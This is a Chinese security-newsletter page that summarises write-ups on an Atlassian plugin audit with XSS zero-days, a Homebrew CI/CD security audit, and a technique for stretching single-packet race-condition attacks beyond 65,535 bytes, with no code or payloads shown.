	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文主要介绍了对Atlassian插件生态系统进行审计的过程，发现了多个0day漏洞，并提出了对插件安全性的建议。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.44831223628691985" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="948" src="https://wechat2rss.xlab.app/img-proxy/?k=ed09ff72&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxds7o5P9bnzg0HMVQibOEnZfqAXLGhceCKVKOfglIcichnu752DniczrJW4w%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.509375" data-w="960" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=03f32564&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsAGFz3evICFfBmogLYLGQH3H81tTTHU4DumlQ8Fof2pObL6ZPTw4AYA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5802083333333333" data-w="960" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=2739988e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdscILzzcNFTZWiciaDxyjxhkYoyWDNsSyMGrub1bPNmsDjftp5gddYydLg%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:白盒 + 灰盒，审计 Atlassian 插件 漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Atlassian 插件审计：53 个 0 天漏洞</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsicIvcXEoO2jzhicXhURl4NzDvByiaJwJV9gl5ib1gJFSrPW4ianoek6HkLg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsicIvcXEoO2jzhicXhURl4NzDvByiaJwJV9gl5ib1gJFSrPW4ianoek6HkLg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122812182525244"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Atlassian市场的插件安全审查流程存在不透明性，审查的详细程序和频率未公开。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">插件开发者在编写宏模块时，缺乏输入验证和输出清理可能导致XSS漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">XSS漏洞在Atlassian插件中的潜在影响很大，尽管有一定的安全措施，攻击者仍可通过各种方式造成破坏。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于插件的安全审计应该是一个系统的过程，包括静态和动态分析，以及手动代码审查。</section></li></ul>
	<br/>
	<p>🏷️: Atlassian, 插件, 零日漏洞, 安全审计</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 Homebrew安全审计发现潜在风险</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">William Woodruff 与 Homebrew 维护者合作进行了对 Homebrew 的安全审计，发现了一些非关键但可能导致执行代码和破坏安全隔离的问题，并提出了改进建议。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="512" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=d4bdfafb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsXMFG1E72LvvVTicyaic54ibQ7P1N9vicBk1pjJJdFq8I9TRGzDZ6GbjlBQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:Mac Homebrew审计，15个中危漏洞</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Homebrew CI/CD 安全审计：确保数百万 macOS 用户的软件安全</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdslRHpcfJoafolEEnDO0mxhb8l8CClDR2Lcj6ggId6g8kIrc3RQF7UsQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdslRHpcfJoafolEEnDO0mxhb8l8CClDR2Lcj6ggId6g8kIrc3RQF7UsQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844184814248528"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Homebrew 的安全性对于下游软件生态系统的整体安全性至关重要，因为它安装了许多关键的软件包。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管 Homebrew 采取了一些措施来提高软件包的可靠性和安全性，但其核心代码库的动态性质为攻击者提供了加载和执行代码的潜在途径。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Homebrew 的 CI/CD 配置复杂且依赖于 GitHub Actions 工作流程中的易于被滥用的模式，这可能被内部人员（如不忠的维护者）利用来破坏 CI/CD 的完整性和隔离假设。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">审计过程中，与 Homebrew 维护者和 PLC 的紧密合作对于理解和改进 Homebrew 的安全性至关重要。</section></li></ul>
	<br/>
	<p>🏷️: Homebrew, 安全审计, CI/CD, 代码执行</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 突破极限：通过首次序列同步扩展单包竞态条件以打破65,535字节限制</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">RyotaK 在文章中介绍了如何通过IP分片和TCP序列号重排来克服单包跑赛攻击的限制，实现超过65,535字节的数据同时发送，从而可以利用超出限制的漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.2680851063829787" data-w="940" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=7873bff2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsjjZT7glEQbEibUTJAscqxXxmo1G7zvkdUy1DUfgjEokxVcYCnot85gw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.525" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4f915628&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsguwp61YG4OC7ZI8uh7F7dvtJW4wic0Buc4zYAmyxOI3817icCYjwIhdQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.525" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=b63791dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsMbySMJLt95jJZic5cjD1Zjg7bic2bYKibcBvxfiaNqXL6eOQUoHgoqAj9w%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
